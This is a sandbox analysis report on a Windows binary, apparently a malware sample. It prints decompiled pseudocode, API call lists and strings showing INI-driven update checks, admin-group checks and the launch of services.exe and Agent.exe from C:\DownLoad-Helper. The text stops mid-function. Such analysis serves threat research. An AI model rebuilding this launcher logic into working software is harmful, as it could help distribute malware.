				_t280 =  *(_t328 - 0x274);
				while(1) {
					_t300 =  *_t212;
					if(_t300 !=  *_t280) {
						break;
					}
					if(_t300 == 0) {
						L21:
						_t213 = 0;
						L23:
						_t340 = _t213;
						if(_t213 != 0) {
							 *(_t328 - 4) = 4;
							E00CA2AB2(_t213, _t328 - 0x274);
							goto L26;
						}
						_t232 = "Updater.ini";
						E00CA66A0(_t328 - 0x270, _t340, "Updater.ini", "Update.ini");
						WritePrivateProfileStringA("RESTART", "restart", "NO",  *(_t328 - 0x270));
						E00CA66A0(_t328 - 0x270, _t340, "Update.ini", "Updater.ini");
						_t219 = E00CA2975(DeleteFileA( *(_t328 - 0x270)),  *(_t328 - 0x274) - 0x10);
						_t96 = _t305 - 0x10; // 0x0
						E00CA2975(E00CA2975(E00CA2975(E00CA2975(_t219, _t96),  *((intOrPtr*)(_t328 - 0x27c)) - 0x10), _t324 - 0x10),  &(( *(_t328 - 0x270))[0xfffffffffffffff0]));
						return E00DDD50E(_t232, _t305, _t324);
					}
					_t301 =  *((intOrPtr*)(_t212 + 1));
					if(_t301 !=  *((intOrPtr*)(_t280 + 1))) {
						break;
					}
					_t212 = _t212 + 2;
					_t280 = _t280 + 2;
					if(_t301 != 0) {
						continue;
					}
					goto L21;
				}
				asm("sbb eax, eax");
				_t213 = _t212 | 0x00000001;
				__eflags = _t213;
				goto L23;
			}

0x00ca5fc9
0x00ca5fc9
0x00ca5fc9
0x00ca5fc9
0x00ca5fc9
0x00ca5fd3
0x00ca5fd8
0x00ca604c
0x00ca604c
0x00ca6051
0x00ca6053
0x00000000
0x00000000
0x00ca5fdc
0x00ca5fdf
0x00ca5fe1
0x00ca5fe8
0x00ca5fea
0x00ca5fef
0x00ca5ff4
0x00ca5ff4
0x00ca6005
0x00ca6008
0x00ca6009
0x00ca600a
0x00ca600b
0x00ca600c
0x00ca6014
0x00ca6014
0x00ca6014
0x00ca6016
0x00ca601c
0x00ca6022
0x00ca6026
0x00ca6028
0x00ca602c
0x00ca602c
0x00ca6031
0x00ca6031
0x00ca6031
0x00ca6035
0x00ca603b
0x00ca603b
0x00ca6045
0x00ca604b
0x00ca604b
0x00ca604b
0x00ca606b
0x00ca606c
0x00ca606d
0x00ca606e
0x00ca606f
0x00ca6071
0x00ca6076
0x00ca608d
0x00ca6092
0x00ca60a2
0x00ca60a7
0x00ca60ba
0x00ca60c4
0x00ca60cf
0x00ca60db
0x00ca60ed
0x00ca60f7
0x00ca6102
0x00ca6107
0x00ca610a
0x00ca6117
0x00ca6123
0x00ca6147
0x00ca6151
0x00ca6165
0x00ca6165
0x00ca6168
0x00ca616e
0x00ca6172
0x00ca617f
0x00ca618b
0x00ca61b7
0x00ca61c1
0x00ca61cc
0x00ca61cf
0x00ca61d0
0x00ca61dc
0x00ca61dc
0x00ca61df
0x00ca63b1
0x00ca63b1
0x00ca63b5
0x00ca63b9
0x00000000
0x00000000
0x00ca61ef
0x00ca61f5
0x00ca61fa
0x00ca61fd
0x00ca6202
0x00ca6210
0x00ca6215
0x00ca6222
0x00ca623d
0x00ca623e
0x00ca623f
0x00ca6240
0x00ca6241
0x00ca6243
0x00ca6248
0x00ca625e
0x00ca6263
0x00ca6272
0x00ca6273
0x00ca6278
0x00ca628b
0x00ca6295
0x00ca62b8
0x00ca62c2
0x00ca62cd
0x00ca62d8
0x00ca62e2
0x00ca62ea
0x00ca6313
0x00ca631d
0x00ca6331
0x00ca6331
0x00ca6334
0x00ca633a
0x00ca633e
0x00ca634b
0x00ca6357
0x00ca6383
0x00ca638d
0x00ca6398
0x00ca6398
0x00ca639b
0x00ca639c
0x00ca63a8
0x00ca63a8
0x00ca63ab
0x00ca63ab
0x00ca63cc
0x00ca63d7
0x00ca63d9
0x00000000
0x00000000
0x00ca63c6
0x00ca63c6
0x00ca63eb
0x00ca6415
0x00ca641f
0x00ca6424
0x00ca642b
0x00ca6430
0x00ca6436
0x00ca643e
0x00ca6444
0x00ca6535
0x00ca6535
0x00ca6537
0x00ca6537
0x00ca653e
0x00ca6540
0x00ca6545
0x00ca654a
0x00ca654a
0x00ca655b
0x00ca655e
0x00ca655f
0x00ca6560
0x00ca6561
0x00ca6562
0x00ca656a
0x00ca656a
0x00ca656a
0x00ca656c
0x00ca6572
0x00ca6575
0x00ca6579
0x00ca657b
0x00ca657f
0x00ca657f
0x00ca6587
0x00ca658e
0x00ca6593
0x00ca6598
0x00ca65aa
0x00ca65ac
0x00ca65ad
0x00ca65ae
0x00ca65af
0x00ca65b1
0x00ca65b2
0x00ca65b7
0x00ca65c5
0x00ca65d0
0x00ca65d7
0x00ca65e6
0x00ca65fc
0x00ca65ff
0x00ca6626
0x00ca6626
0x00ca6606
0x00ca660c
0x00ca6617
0x00ca661b
0x00ca661b
0x00ca6537
0x00ca644a
0x00ca6455
0x00ca645a
0x00ca645e
0x00ca6460
0x00ca6466
0x00ca6466
0x00ca646a
0x00000000
0x00000000
0x00ca646e
0x00ca6482
0x00ca6482
0x00ca648b
0x00ca648b
0x00ca648d
0x00ca652c
0x00ca6530
0x00000000
0x00ca6530
0x00ca6498
0x00ca64a4
0x00ca64be
0x00ca64d0
0x00ca64ea
0x00ca64ef
0x00ca6516
0x00ca6523
0x00ca6523
0x00ca6470
0x00ca6476
0x00000000
0x00000000
0x00ca6478
0x00ca647b
0x00ca6480
0x00000000
0x00000000
0x00000000
0x00ca6480
0x00ca6486
0x00ca6488
0x00ca6488
0x00000000

APIs

Sleep.KERNEL32(000003E8,00000274), ref: 00CA6045
__EH_prolog3_GS.LIBCMT ref: 00CA5FD3

Part of subcall function 00CA5D23: CoInitialize.OLE32(00000000), ref: 00CA5D2D
Part of subcall function 00CA5D23: CoCreateInstance.OLE32(00E3EEEC,00000000,00000017,00E3EEFC,?), ref: 00CA5D47
Part of subcall function 00CA5D23: CoUninitialize.OLE32 ref: 00CA5DB5

GetPrivateProfileStringA.KERNEL32(MAINVER,mainver,00000000,00000000,00000080,?), ref: 00CA60ED
GetPrivateProfileStringA.KERNEL32(INIURL,iniurl,00000000,00000000,00000104,?), ref: 00CA6147
GetPrivateProfileStringA.KERNEL32(RESTART,restart,00000000,00000000,00000104,?), ref: 00CA61B7
Sleep.KERNEL32(000003E8), ref: 00CA61EF
GetPrivateProfileStringA.KERNEL32(MAINVER,mainver,00000000,00000000,00000080,?), ref: 00CA62B8
Sleep.KERNEL32(000003E8,000000FF), ref: 00CA63C6
GetPrivateProfileStringA.KERNEL32(INIURL,iniurl,00000000,00000000,00000104,?), ref: 00CA6313

Part of subcall function 00CA55D3: __EH_prolog3_GS.LIBCMT ref: 00CA55DD

GetPrivateProfileStringA.KERNEL32(MAINVER,mainver,00000000,00000000,00000080,?), ref: 00CA6415
WritePrivateProfileStringA.KERNEL32(RESTART,restart,00E4BD50,?), ref: 00CA64BE
DeleteFileA.KERNEL32(?,Update.ini,Updater.ini), ref: 00CA64DB
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00CA65F6
Sleep.KERNEL32(000003E8,?,?,000000FF), ref: 00CA6606
ExitProcess.KERNEL32 ref: 00CA6626

Strings

YES, xrefs: 00CA644A
Updater.ini, xrefs: 00CA63DB, 00CA6498, 00CA64A3, 00CA64C4
INIURL, xrefs: 00CA6142, 00CA630E
MAINVER, xrefs: 00CA60E8, 00CA62B3, 00CA6410
C:\DownLoad-Helper\services.exe, xrefs: 00CA600C, 00CA6562
iniurl, xrefs: 00CA613D, 00CA6309
RESTART, xrefs: 00CA61B2, 00CA637E, 00CA64B9
Update.ini, xrefs: 00CA63E0, 00CA6493, 00CA64C5
\Agent.exe, xrefs: 00CA65C0
\Update.ini, xrefs: 00CA607B, 00CA624D
mainver, xrefs: 00CA60E3, 00CA62AE, 00CA640B
restart, xrefs: 00CA61AD, 00CA6379, 00CA64B4
open, xrefs: 00CA65F0
C:\DownLoad-Helper, xrefs: 00CA6055, 00CA6227, 00CA6593

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: PrivateProfileString$Sleep$H_prolog3_$CreateDeleteExecuteExitFileInitializeInstanceProcessShellUninitializeWrite
String ID: C:\DownLoad-Helper$C:\DownLoad-Helper\services.exe$INIURL$MAINVER$RESTART$Update.ini$Updater.ini$YES$\Agent.exe$\Update.ini$iniurl$mainver$open$restart
API String ID: 3088069162-3283305857
Opcode ID: d87bbf5eae6de6aeabea0420bba515ccdc58a0a8269f4f21861a93d9617091d2
Instruction ID: 17411eb5eb654aeb04206d0c2282d0c73382e7c15077ad45d182ddd5f75348e6
Opcode Fuzzy Hash: d87bbf5eae6de6aeabea0420bba515ccdc58a0a8269f4f21861a93d9617091d2
Instruction Fuzzy Hash: 6BF1BF3180522AAADF20FB74DC8AFEEB739AF16318F240194B459771D2DB715E48DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA889D Relevance: 36.2, APIs: 24, Instructions: 166
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00CA889D() {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				struct _GENERIC_MAPPING _v32;
				struct _PRIVILEGE_SET _v52;
				void* _v56;
				int _v60;
				void* _v64;
				long _v68;
				long _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				int _t35;
				signed int _t63;
				void* _t74;
				long _t75;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t86;
				void* _t87;
				signed int _t89;

				_t33 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t33 ^ _t89;
				_v68 = 0x14;
				_v56 = 0;
				_v60 = 0;
				_v16.Value = 0;
				_v12 = 0x500;
				_t35 = ImpersonateSelf(2); // executed
				if(_t35 == 0) {
					L20:
					_pop(_t74);
					if(_v56 != 0) {
						FreeSid(_v56);
					}
					return E00DDCBCE(_v60, _t74, _v8 ^ _t89, _t81, _t82, _t86);
				}
				_push(_t86);
				_push(_t82);
				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v64) != 0 || GetLastError() == 0x3f0 && OpenProcessToken(GetCurrentProcess(), 8,  &_v64) != 0 && OpenProcessToken(GetCurrentProcess(), 8,  &_v64) != 0) {
					if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v56) == 0) {
						goto L19;
					}
					_t87 = LocalAlloc(0x40, 0x14);
					if(_t87 == 0) {
						goto L19;
					}
					if(InitializeSecurityDescriptor(_t87, 1) != 0) {
						_t13 = GetLengthSid(_v56) + 0x10; // 0x10
						_t75 = _t13;
						_t84 = LocalAlloc(0x40, _t75);
						if(_t84 != 0) {
							if(InitializeAcl(_t84, _t75, 2) != 0 && AddAccessAllowedAce(_t84, 2, 3, _v56) != 0 && SetSecurityDescriptorDacl(_t87, 1, _t84, 0) != 0 && SetSecurityDescriptorGroup(_t87, _v56, 0) != 0 && SetSecurityDescriptorOwner(_t87, _v56, 0) != 0 && IsValidSecurityDescriptor(_t87) != 0) {
								_v32.GenericWrite = 2;
								_v32.GenericExecute = 0;
								_v32.GenericAll = 3;
								_v32.GenericRead = 1;
								if(AccessCheck(_t87, _v64, 1,  &_v32,  &_v52,  &_v68,  &_v72,  &_v60) != 0) {
									_t63 = RevertToSelf(); // executed
									asm("sbb eax, eax");
									_v60 = _v60 &  ~_t63;
								}
							}
							LocalFree(_t84);
						}
					}
					LocalFree(_t87);
					goto L19;
				} else {
					L19:
					_pop(_t82);
					_pop(_t86);
					goto L20;
				}
			}

0x00ca88a3
0x00ca88aa
0x00ca88b0
0x00ca88b9
0x00ca88bc
0x00ca88bf
0x00ca88c2
0x00ca88c8
0x00ca88d0
0x00ca8a53
0x00ca8a57
0x00ca8a58
0x00ca8a5d
0x00ca8a5d
0x00ca8a71
0x00ca8a71
0x00ca88d6
0x00ca88d7
0x00ca88ee
0x00ca8952
0x00000000
0x00000000
0x00ca8964
0x00ca8968
0x00000000
0x00000000
0x00ca8979
0x00ca8988
0x00ca8988
0x00ca8990
0x00ca8994
0x00ca89a6
0x00ca89ff
0x00ca8a0a
0x00ca8a11
0x00ca8a28
0x00ca8a34
0x00ca8a36
0x00ca8a3e
0x00ca8a40
0x00ca8a40
0x00ca8a34
0x00ca8a44
0x00ca8a44
0x00ca8994
0x00ca8a4b
0x00000000
0x00ca8a51
0x00ca8a51
0x00ca8a51
0x00ca8a52
0x00000000
0x00ca8a52

APIs

ImpersonateSelf.KERNELBASE(00000002), ref: 00CA88C8
GetCurrentThread.KERNEL32 ref: 00CA88DF
OpenThreadToken.ADVAPI32(00000000), ref: 00CA88E6
GetLastError.KERNEL32 ref: 00CA88F0
GetCurrentProcess.KERNEL32(00000008,?), ref: 00CA890D
OpenProcessToken.ADVAPI32(00000000), ref: 00CA8916
GetCurrentProcess.KERNEL32(00000008,?), ref: 00CA8926
OpenProcessToken.ADVAPI32(00000000), ref: 00CA8929
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA894A
LocalAlloc.KERNEL32(00000040,00000014), ref: 00CA8962
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00CA8971
GetLengthSid.ADVAPI32(?), ref: 00CA8982
LocalAlloc.KERNEL32(00000040,00000010), ref: 00CA898E
InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 00CA899E
AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000003,?), ref: 00CA89B4
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00CA89C9
SetSecurityDescriptorGroup.ADVAPI32(00000000,?,00000000), ref: 00CA89D8
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00CA89E7
IsValidSecurityDescriptor.ADVAPI32(00000000), ref: 00CA89F2
AccessCheck.ADVAPI32(00000000,?,00000001,?,?,00000014,?,?), ref: 00CA8A2C
RevertToSelf.KERNELBASE ref: 00CA8A36
LocalFree.KERNEL32(00000000), ref: 00CA8A44
LocalFree.KERNEL32(00000000), ref: 00CA8A4B
FreeSid.ADVAPI32(00000000), ref: 00CA8A5D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: DescriptorSecurity$LocalProcess$CurrentFreeInitializeOpenToken$AccessAllocSelfThread$AllocateAllowedCheckDaclErrorGroupImpersonateLastLengthOwnerRevertValid
String ID:
API String ID: 897049590-0
Opcode ID: fbe8edccb59c2f19ba7a09c261b34984c6806bfdd79c49f64e74e5a7d01b565d
Instruction ID: 8a8b294c23845b033a8ba1947856a2252d806e6dcc8548976f46d510ebb60534
Opcode Fuzzy Hash: fbe8edccb59c2f19ba7a09c261b34984c6806bfdd79c49f64e74e5a7d01b565d
Instruction Fuzzy Hash: 73511271A40209AFEB119FA2EC89FEE7BBCEF09B44F004015F551F2190DB749E499B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CAC295 Relevance: 16.6, APIs: 11, Instructions: 137
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00CAC295(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, long _a16) {
				intOrPtr _v0;
				signed int _v4;
				struct _WIN32_FIND_DATAA _v336;
				CHAR* _v340;
				CHAR* _v344;
				CHAR* _v348;
				long _v352;
				long _v356;
				CHAR* _t41;
				long _t45;
				void* _t49;
				long _t56;
				long _t59;
				void* _t64;
				CHAR* _t75;
				void* _t76;
				void* _t90;
				long _t92;

				_t93 = __esi;
				_push(0x158);
				E00DDD55F(0xe083cf, __ebx, __edi, __esi);
				_t41 = _a8;
				_t75 = _a12;
				_t92 = _a16;
				_v340 = _t41;
				if(_t41 == 0 || _t75 == 0) {
					E00CAA4E7(_t75, _t76, _t92, _t93, __eflags);
					asm("int3");
					return E00CA4F80(_t75, _t76, _t92, _t93, E00DEC84C(_v0, _a4, _a8));
				} else {
					_t94 = 0x104;
					_t45 = GetFullPathNameA(_t75, 0x104, _t41,  &_v344);
					if(_t45 != 0) {
						__eflags = _t45 - 0x104;
						if(__eflags < 0) {
							E00CA67E1( &_v348);
							_v4 = _v4 & 0x00000000;
							E00CABB19(_t75, __eflags, _v340,  &_v348);
							_t94 = _v348;
							_t49 = PathIsUNCA(_t94);
							__eflags = _t49;
							if(_t49 != 0) {
								L21:
								E00CA2975(_t49, _t94 - 0x10);
							} else {
								_t56 = GetVolumeInformationA(_t94, 0, 0, 0,  &_v356,  &_v352, 0, 0); // executed
								__eflags = _t56;
								if(_t56 != 0) {
									_t49 = _v352;
									__eflags = _t49 & 0x00000002;
									if((_t49 & 0x00000002) == 0) {
										CharUpperA(_v340);
										_t49 = _v352;
									}
									__eflags = _t49 & 0x00000004;
									if((_t49 & 0x00000004) != 0) {
										goto L21;
									} else {
										_t49 = FindFirstFileA(_t75,  &_v336);
										__eflags = _t49 - 0xffffffff;
										if(_t49 == 0xffffffff) {
											goto L21;
										} else {
											FindClose(_t49);
											_t59 = _v344;
											__eflags = _t59;
											if(_t59 == 0) {
												goto L11;
											} else {
												__eflags = _t59 - _v340;
												if(_t59 <= _v340) {
													goto L11;
												} else {
													_t64 = E00DEC1A0( &(_v336.cFileName));
													_t90 = _v344 - _v340;
													_t60 = _t64 + _t90;
													__eflags = _t64 + _t90 - 0x104;
													if(_t64 + _t90 >= 0x104) {
														__eflags = _t92;
														if(_t92 != 0) {
															 *((intOrPtr*)(_t92 + 8)) = 3;
															_push(E00DEC1A0(_t75));
															_t60 = E00CA2CD7(_t75, _t92 + 0x10, _t92, _t94, _t75);
														}
														goto L12;
													} else {
														__eflags = 0x104;
														_t49 = E00CA4F80(_t75, 0x104 - _t90, _t92, _t94, E00DEC84C(_v344, 0x104 - _t90,  &(_v336.cFileName)));
														goto L21;
													}
												}
											}
										}
									}
								} else {
									L11:
									_t60 = E00CAC253(_t75, _t92, _t75);
									L12:
									E00CA2975(_t60, _t94 - 0x10);
									goto L4;
								}
							}
						} else {
							__eflags = _t92;
							if(_t92 != 0) {
								 *((intOrPtr*)(_t92 + 8)) = 3;
								_push(E00DEC1A0(_t75));
								E00CA2CD7(_t75, _t92 + 0x10, _t92, 0x104, _t75);
							}
							goto L4;
						}
					} else {
						E00CA4F80(_t75,  &_v344, _t92, 0x104, E00DEC22B(_v340, 0x104, _t75, 0xffffffff));
						E00CAC253(_t75, _t92, _t75);
						L4:
					}
					return E00DDD50E(_t75, _t92, _t94);
				}
			}

0x00cac295
0x00cac295
0x00cac29f
0x00cac2a4
0x00cac2a7
0x00cac2aa
0x00cac2ad
0x00cac2b5
0x00cac454
0x00cac459
0x00cac475
0x00cac2c3
0x00cac2c9
0x00cac2d2
0x00cac2da
0x00cac305
0x00cac307
0x00cac32d
0x00cac332
0x00cac343
0x00cac348
0x00cac34f
0x00cac355
0x00cac357
0x00cac41f
0x00cac422
0x00cac35d
0x00cac373
0x00cac379
0x00cac37b
0x00cac391
0x00cac397
0x00cac399
0x00cac3a1
0x00cac3a7
0x00cac3a7
0x00cac3ad
0x00cac3af
0x00000000
0x00cac3b1
0x00cac3b9
0x00cac3bf
0x00cac3c2
0x00000000
0x00cac3c4
0x00cac3c5
0x00cac3cb
0x00cac3d1
0x00cac3d3
0x00000000
0x00cac3d5
0x00cac3d5
0x00cac3db
0x00000000
0x00cac3dd
0x00cac3e4
0x00cac3ef
0x00cac3f6
0x00cac3fd
0x00cac3ff
0x00cac42f
0x00cac431
0x00cac438
0x00cac445
0x00cac44a
0x00cac44a
0x00000000
0x00cac401
0x00cac407
0x00cac417
0x00000000
0x00cac41c
0x00cac3ff
0x00cac3db
0x00cac3d3
0x00cac3c2
0x00cac37d
0x00cac37d
0x00cac37f
0x00cac384
0x00cac387
0x00000000
0x00cac387
0x00cac37b
0x00cac309
0x00cac309
0x00cac30b
0x00cac30e
0x00cac31b
0x00cac320
0x00cac320
0x00000000
0x00cac30b
0x00cac2dc
0x00cac2ec
0x00cac2f6
0x00cac2fb
0x00cac2fb
0x00cac302
0x00cac302

APIs

__EH_prolog3_GS.LIBCMT ref: 00CAC29F
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000158,00CABEEC,?,?,?,?,00000104,00000000,?,?,00000000), ref: 00CAC2D2
PathIsUNCA.SHLWAPI(?,?,?), ref: 00CAC34F
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CAC373
__cftof.LIBCMT ref: 00CAC2E6

Part of subcall function 00CAC253: GetLastError.KERNEL32(?,00000000,?,0000000D,000000FF,00000000,?,00CA74BE,?,00000000,?,00000000,?,00000400,00000000,00000000), ref: 00CAC25F

Part of subcall function 00CABB19: __cftof.LIBCMT ref: 00CABB3E
Part of subcall function 00CABB19: PathStripToRootA.SHLWAPI(00000000,?,00000104,?,00000104,?,00CAC348,?,?), ref: 00CABB4D

_strlen.LIBCMT ref: 00CAC315
CharUpperA.USER32(?), ref: 00CAC3A1
FindFirstFileA.KERNEL32(?,?), ref: 00CAC3B9
FindClose.KERNEL32(00000000), ref: 00CAC3C5
_strlen.LIBCMT ref: 00CAC3E4
_strlen.LIBCMT ref: 00CAC43F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Path_strlen$Find__cftof$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume
String ID:
API String ID: 4231165794-0
Opcode ID: d02ba89c7c93f0ef0c89520acbe1488d52f1a6a179458f8474cc593d93ceb9c5
Instruction ID: a2a25b590795c53c9abe37bda5bc7ed17909cf0fbb3077d5ca31fa6ae3357b71
Opcode Fuzzy Hash: d02ba89c7c93f0ef0c89520acbe1488d52f1a6a179458f8474cc593d93ceb9c5
Instruction Fuzzy Hash: 7541E57150051AAFEB20AF65CCC9EFF737CEF46308F004598B869E6251EB349E859B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5D23 Relevance: 4.6, APIs: 3, Instructions: 69
comCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00CA5D23() {
				void* _v8;
				char _v12;
				signed int _v16;
				signed int _t23;
				signed int _t29;
				intOrPtr* _t31;
				void* _t33;

				_t29 = 0;
				__imp__CoInitialize(0); // executed
				_t23 =  &_v8;
				_v8 = 0;
				__imp__CoCreateInstance(0xe3eeec, 0, 0x17, 0xe3eefc, _t23); // executed
				_t31 = _v8;
				if(_t23 < 0) {
					L10:
					if(_t31 != 0) {
						_t23 =  *((intOrPtr*)( *_t31 + 8))(_t31);
					}
					__imp__CoUninitialize(); // executed
					return _t23 & 0xffffff00 | _t29 != 0x00000000;
				}
				_t33 = 0;
				_v12 = 0;
				if(_t31 == 0) {
					L4:
					_t23 = _t29;
					_v16 = _t23;
					if(_t33 == 0) {
						L7:
						_t29 = 0 | _t23 == 0x0000ffff;
						L8:
						if(_t33 != 0) {
							_t23 =  *((intOrPtr*)( *_t33 + 8))(_t33);
							_t31 = _v8;
						}
						goto L10;
					}
					_t23 =  *((intOrPtr*)( *_t33 + 0x2c))(_t33,  &_v16);
					if(_t23 < 0) {
						L13:
						_t31 = _v8;
						_t33 = _v12;
						goto L8;
					}
					_t31 = _v8;
					_t33 = _v12;
					_t23 = _v16;
					goto L7;
				}
				_t23 =  *((intOrPtr*)( *_t31))(_t31, 0xe3eedc,  &_v12);
				if(_t23 < 0) {
					goto L13;
				}
				_t31 = _v8;
				_t33 = _v12;
				goto L4;
			}

0x00ca5d2a
0x00ca5d2d
0x00ca5d33
0x00ca5d36
0x00ca5d47
0x00ca5d4d
0x00ca5d52
0x00ca5dab
0x00ca5dad
0x00ca5db2
0x00ca5db2
0x00ca5db5
0x00ca5dc2
0x00ca5dc2
0x00ca5d54
0x00ca5d56
0x00ca5d5b
0x00ca5d75
0x00ca5d75
0x00ca5d77
0x00ca5d7c
0x00ca5d95
0x00ca5d9b
0x00ca5d9e
0x00ca5da0
0x00ca5da5
0x00ca5da8
0x00ca5da8
0x00000000
0x00ca5da0
0x00ca5d85
0x00ca5d8a
0x00ca5dc3
0x00ca5dc3
0x00ca5dc6
0x00000000
0x00ca5dc6
0x00ca5d8c
0x00ca5d8f
0x00ca5d92
0x00000000
0x00ca5d92
0x00ca5d69
0x00ca5d6d
0x00000000
0x00000000
0x00ca5d6f
0x00ca5d72
0x00000000

APIs

CoInitialize.OLE32(00000000), ref: 00CA5D2D
CoCreateInstance.OLE32(00E3EEEC,00000000,00000017,00E3EEFC,?), ref: 00CA5D47
CoUninitialize.OLE32 ref: 00CA5DB5

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID:
API String ID: 948891078-0
Opcode ID: 5501b3a10974a61520ecdeb24e5500cb891a227d7e834c4ea1e6c900fe193a6e
Instruction ID: 7a9a5ae0e7b6777fcd2fa176253346eca71b4c63354de376f1342e09768b5baa
Opcode Fuzzy Hash: 5501b3a10974a61520ecdeb24e5500cb891a227d7e834c4ea1e6c900fe193a6e
Instruction Fuzzy Hash: 17212178F0070AEFDB14DFA5C988DAFBBB9AF85704B14C4A8A401A7254DB70EE45DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00CD91A9 Relevance: 70.4, APIs: 35, Strings: 5, Instructions: 370
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00CD91A9(void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int __fp0) {
				signed int _v4;
				signed int _v13;
				signed int _v20;
				char _v24;
				struct HDC__* _v36;
				intOrPtr _v40;
				char _v44;
				struct tagLOGFONTA _v76;
				struct HDC__* _v84;
				char _v92;
				char _v232;
				char _v237;
				char _v240;
				signed int _v244;
				signed int _v260;
				char _v420;
				char _v524;
				signed int _v528;
				char _v764;
				signed int _v768;
				signed long long _v772;
				signed int _v776;
				char _v780;
				struct HDC__* _v792;
				struct HDC__* _v796;
				char _v800;
				signed char _t244;
				void* _t245;
				void* _t246;
				void* _t247;
				void* _t248;
				void* _t249;
				void* _t250;
				void* _t251;
				void* _t252;
				long _t262;
				signed int _t270;
				struct HFONT__* _t294;
				void* _t296;
				long _t309;
				signed int _t310;
				signed int _t312;
				long _t315;
				long _t316;
				long _t317;
				long _t318;
				long _t319;
				long _t320;
				long _t325;
				long _t335;
				long _t336;
				signed int _t337;
				signed int _t343;
				signed char _t344;
				long _t347;
				long _t355;
				signed int _t358;
				struct HBRUSH__* _t362;
				struct HBRUSH__* _t363;
				struct HBRUSH__* _t365;
